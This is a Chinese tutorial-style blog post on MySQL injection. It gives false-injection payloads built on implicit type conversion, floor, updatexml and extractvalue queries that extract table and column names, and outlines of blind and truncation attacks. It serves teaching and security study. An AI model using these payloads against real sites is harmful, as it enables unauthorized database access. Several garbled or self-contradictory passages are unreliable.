mysql中文注入_Mysql注入-Go语言中文社区

最新推荐文章于 2022-01-14 12:38:43 发布
最新推荐文章于 2022-01-14 12:38:43 发布
阅读量84 收藏
点赞数
文章标签: mysql中文注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39727706/article/details/113555650
版权

0x01 False Injection

18cc104e2df091518712ce46c8b21bc0.png

username=0时数据库会返回数据,尝试一下使password=0会不会返回同样的数据。

6ce8bf608f34a91a8ae778bdde6b9290.png

空集无法查询

MYSQL的隐式类型转换。

如果两个参数比较,有至少一个NULL,结果就是NULL,除了是用NULL<=>NULL 会返回1。不做类型转换

两个参数都是字符串,按照字符串比较。不做类型转换

两个参数都是整数,按照整数比较。不做类型转换

如果不与数字进行比较,则将十六进制值视为二进制字符串。

有一个参数是 decimal 类型,如果另外一个参数是 decimal 或者整数,会将整数转换为 decimal 后进行比较,如果另外一个参数是浮点数,则会把 decimal 转换为浮点数进行比较

所有其他情况下,两个参数都会被转换为浮点数再进行比较

举几个例子看一下:

0adfcf0fe1c7eea3eb328bb383fd2714.png

可以看得到例如6和6aa进行比较的时候 6aa会强制转换为6,这时6=6 返回true

username=0会导致返回数据了,就是因为这里会将数据转换为浮点数比较,但是字符串转换会出问题,从而返回0使得0=0从而为true得到结果。

2、利用

算术运算符

实际中我们接触到的语句都是带有引号的,类似于where username='+input+' 这样的,这时候我们就需要做一些处理来构造false注入的利用点。

输入+ 则相当于语句被转化为 where username="+"

+,-,*,/,%都是同理。

比较运算符

安全等于:<=>

'=0<=>1# 拼接的语句:where username=''=0<=>1#'

不等于<>(!=)

'=0<>0# 拼接的语句:where username=''=0<>0#'

利用一下这个特点

两种情况均返回true,原因在于后面存在的亦或表达式会使前面的判断类型都转换为浮点型数据。因此都变为0。

0x02

注入常用函数与字符

这个作为我们用来测试的表单。

4c5b354a4e855b8e83c437b6eccc7e5f.png

下面的函数是经常会用到的。

mid()---从文本字段中提取字符

SELECT MID(column_name,start[,length]) FROM table_name;

column_name 必需。要提取字符的字段。

start 必需。规定开始位置(起始值是 1)。

length 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。

2aa522316b38e911448382be083720c0.png

limit()---返回前几条或者中间某几行数据

select * from table limit m,n;

其m指记录始index0始表示第条记录 n指第m+1条始取n条

0c4b2fab273599c0aaff0f85205250c6.png

concat、concat_ws、group_concat

MySQL的concat函数在连接字符串的时候,只要其中一个是NULL,那么将返回NULL

5292f67c1bf1dffcaa09626b04578c30.png

group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator '分隔符'])

6adad13117070b5e003a2e4119bdfe85.png

rand随机数(产生0,1之间随机数)

5d078838946c3fddf39efa6f32c4a236.png

报错注入

基于floor,UpdateXml(有长度限制,最长32位),ExtractValue(有长度限制,最长32位)进行报错注入。

获取数据库

select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) name frominformation_schema.tablesgroup by name;

63a270c4c0a33f4a35ace0b70542f5fa.png

获取数据表

select count(*),concat(0x3a,0x3a,(select table_name frominformation_sche

ma.tableswhere table_schema=database() limit 3,1),0x3a,floor(rand()*2)) name fr

om information_schema.tablesgroup by name;

07252b02529f4aaf4f5fca0d5e852380.png

获取字段

select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

d17086b055a46afe3351e4b6fcff0a13.png

UpdateXml报错注入

获取数据表

mysql> select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM informatio

n_schema.tables WHERE table_schema=database() limit 3,1)),0);

ERROR 1105 (HY000): XPATH syntax error: '~ctf'

获取字段

mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);

ERROR1105 (HY000): XPATH syntax error: '~password'mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 3,1)),0);

ERROR1105 (HY000): XPATH syntax error: '~user'

基于布尔盲注

mysql> select table_name from information_schema.tables where table_schema=database() limit 3,1;

limit x,y 是需要进行尝试的。猜测数据库

7736b8f275f07ab1f6ca668c42d6c451.png

基于时间盲注

基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0。但是如果查询语句的条件不存在,执行的时间便是0,利用该函数这样一个特殊的性质,可以利用时间延迟来判断我们查询的是否存在。这便是SQL基于时间延迟的盲注的工作原理

Mysql约束攻击

在mysql数据库中当插入某个字段的值超过了预设的长度,mysql会自动造成截断。

实例:在数据表中插入'lovehsy' 和 ‘lovehsy    '两条数据。

a2de2a478787c3162c2083e4e390ed33.png

对比一下两者

45c151fd4b845e57d446856d4c6d445c.png

虽然在长度方面是不同的但是在前端验证的时候两者会被当成相同的字符串来处理。

weixin_39727706
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
go+mysql+注入_MySQL注入入门类型-Go语言中文社区
weixin_33655208的博客
02-23 222
MySQL数据库基础知识及注入一、网站后台的PHP代码echo "HELLO";$id = $_GET['id']; #$id使用GET方式传入$conn = mysqli_connect('localhost', 'root', '913347102', 'tpshop'); #连接MySQL数据库if(!$conn)die("Connection failed:".mysqli_connec...
Go 依赖注入 - Dig
Seekload
09-14 450
点击上方蓝色“Golang来啦”关注我哟加个“星标”,天天 15 分钟,掌握 Go 语言via:https://blog.drewolson.org/dependency-injecti...
go语言连接mysql、sqlx、sql注入
一个非常Cool的人
01-14 4874
介绍了go语言如何操作mysql的几种方法,以及使用sqlx简化操作数据库的方法,还阐述了sql注入攻击的原理,以及模拟sql注入攻击。
mysql_MySQL手注之报错注入
weixin_39969340的博客
01-28 121
报错注入:指在页面中没有一个合适的数据返回点的情况下,利用mysql函数的报错来创造一个显位的注入。先来了解一下报错注入常用的函数XML:指可扩展标记语言被设计用来传输和存储数据。concat:返回结果为连接参数产⽣的字符串报错注入常用的函数:extractvalue():对XML文档进行查询的函数语法:extractvalue(目标xml文档,xml路径)第二个参数xml中的位置是可操作的地方,...
简单介绍下常用SQL注入函数和中文处理方法
三朝看客
07-18 675
一、常用SQL注入函数 有SQL语言基础的人,在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。 Access:asc(字符) SQLServer:unicode(字符) 作用:返回某字符的ASCII码 Access:chr(数字) SQLServer:nchar(数字) 作用:与asc相反,根据ASCII码返回字符 Access:mi...
在golang中操作mysql数据库的实现代码
12-16
前言 Golang 提供了database/sql包用于对SQL数据库的访问, 作为操作数据库的入口对象sql.DB, 主要为我们提供了两个重要的功能: •sql.DB 通过数据库驱动为我们提供管理底层数据库连接的打开和...Golang操作mysql数据库
go语言写的MySQL驱动源代码.zip
09-10
这个压缩包"go语言写的MySQL驱动源代码.zip"包含了一个用Go语言编写的MySQL驱动的源代码,这对于理解Go语言与数据库交互的机制非常有帮助。让我们深入探讨一下其中涉及的知识点。 1. **Go语言基础**: Go语言,也...
go语言写的mysql方面的项目资料.zip
最新发布
09-11
在本项目资料中,我们关注的是使用Go语言(Golang)进行MySQL数据库操作的相关实践与技术。Go语言因其高效、简洁的语法以及强大的并发能力,常被用于构建高性能的网络服务,而MySQL作为广泛使用的开源关系型数据库,...
golang(gin)整合mysql,整合redis通用脚手架
04-06
在后端开发中,Go语言(Golang)以其高效、简洁和并发能力强大而受到越来越多的关注。 Gin框架是Go语言中一个快速、简洁且结构化的Web框架,它提供了高效的路由和中间件支持,使得开发RESTful API变得简单易行。本...
PHP+MySQL网站注入.pdf
10-10
【PHP+MySQL网站注入】是网络安全领域中一种常见的攻击手段,主要针对使用PHP语言开发、MySQL作为数据库的网站。攻击者通过输入特定的SQL语句,利用网站程序处理输入时的漏洞,获取或篡改数据库中的敏感信息。本文将...
mysql 盲注查询语句_SQL盲注
weixin_35748508的博客
02-18 116
如果数据库运行返回结果时只反馈对错不会返回数据库当中的信息此时可以采用逻辑判断是否正确的盲注来获取信息盲注是不能通过直接显示的途径来获取数据库数据的方法1.布尔盲注2.时间盲注3.报错型盲注布尔盲注某些查询是不需要返回结果的,金判断查询语句是否正确执行,所以其返回可以看做一个布尔值,正常显示为true,报错或是其他不正常显示为false.SELECT userid FROM member WHER...
mysql盲注 多字节字符_Web安全-基于SQLI的SQL盲注常用函数实验
weixin_39721953的博客
02-08 113
实验目的通过本实验理解MySQL盲注常用函数的功能,掌握MySQL盲注常用函数在SQL注入中的应用方法,熟悉SQL注入的常见流程。实验环境目标网站:SQLI平台中的Less-5实验原理先来分析一下Less-5源码中GET提交不同参数时的反应(1)如果正确(2)如果错误(3)如果提交?id=1'时浏览器前端的反应可以看到,如果运行返回结果正确的时候只返回you are in...,不会返回数据库当中...
mysql中文注入_MySQL SQL注入
weixin_42098104的博客
02-02 164
MySQL SQL注入发布于 2015-08-01 00:21:39 | 439 次阅读 | 评论: 0 | 来源: 网络整理如果通过网页需要用户输入一些数据信息,并将其插入到MySQL数据库,这是一个引入SQL注入安全问题的机会。这一节将学习如何防止这种情况的发生,并帮助保护脚本和MySQL语句。通常注入是在当要求用户输入时,类似他们的姓名,只是一个名字,他们给出,会在不知不觉中包含MySQL的...
Go语言学习笔记(Golang操作MySQL数据库)
塞外听雪
08-19 645
GO连接MySQL 通过GO页面作为客户端访问数据库 1.因为GO语言没有提供任何官方数据库驱动,所以需要安装第三方函数库。 2.由于在github上安装,所以需要安装git软件,安装过程一直点击下一步即可,安装完需要配置环境变量 git自行下载 配置gopath环境变量,配置完git到的包自动下载到那里 安装完git后使用get指令下载第三方函数库 一.安装数据库驱动 在cmd命令窗口中输入如下...
避免SQL注入
weixin_34307464的博客
08-10 170
为什么80%的码农都做不了架构师?>>> ...
Go,Gorm 和 Mysql 是如何防止 SQL 注入
每一个不曾起舞的日子,都是对人生的辜负。
08-21 9731
Go,Gorm 和 Mysql 是如何防止 SQL 注入的 SQL 注入和 SQL 预编译技术 什么是 SQL 注入 所谓SQL注入(sql inject),就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL 注入例子 如下所示
golang防止MySQL注入_Go语言SQL注入和防注入
weixin_42287518的博客
01-19 1782
Go语言SQL注入和防注入一、SQL注入是什么SQL注入是一种注入攻击手段,通过执行恶意SQL语句,进而将任意SQL代码插入数据库查询,从而使攻击者完全控制Web应用程序后台的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序验证,比如绕过登录验证登录Web身份验证和授权页面;也可以绕过网页,直接检索数据库的所有内容;还可以恶意修改、删除和增加数据库内容。二、防止SQl注入的思路和方法1.永远...
【SQL注入技巧拓展】————1、MySQL False注入及技巧总结
Fly_鹏程万里
12-22 939
本篇文章对False注入进行了一下系统地总结,同时结合实例介绍了SQL注入的相关技巧。 一、False Injection 1、引子 首先我们常见的注入 1=1  0&lt;1  ''=''  这些都是基于1=1这样的比较普通的注入,下面来说说关于False注入,利用False我们可以绕过一些特定的WAF以及一些未来不确定的因素,其中有些姿势之前了解但是没有去深入,这次做一个归纳...
go操作mysql
kismile
09-06 920
[TOC] ​ go的标准库database/sql包提供了保证sql或者类sql数据库的通用接口,但是没有提供具体数据库的驱动。因此使用database/sql包的时候必须注入至少一个数据库驱动 sql标准库和驱动部署与使用 mysql驱动 go get -u github.com/go-sql-driver/mysql func Open(driverN...
Go语言编程:完美的Web开发指南
书中的内容覆盖了Go语言的基础、Web开发的基本原理以及各种相关技术,如数据库操作、文件处理、安全防护等。 在Go语言基础部分,读者将学习到Go语言的安装配置,包括设置GOPATH和理解工作空间的概念。书中详细介绍...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值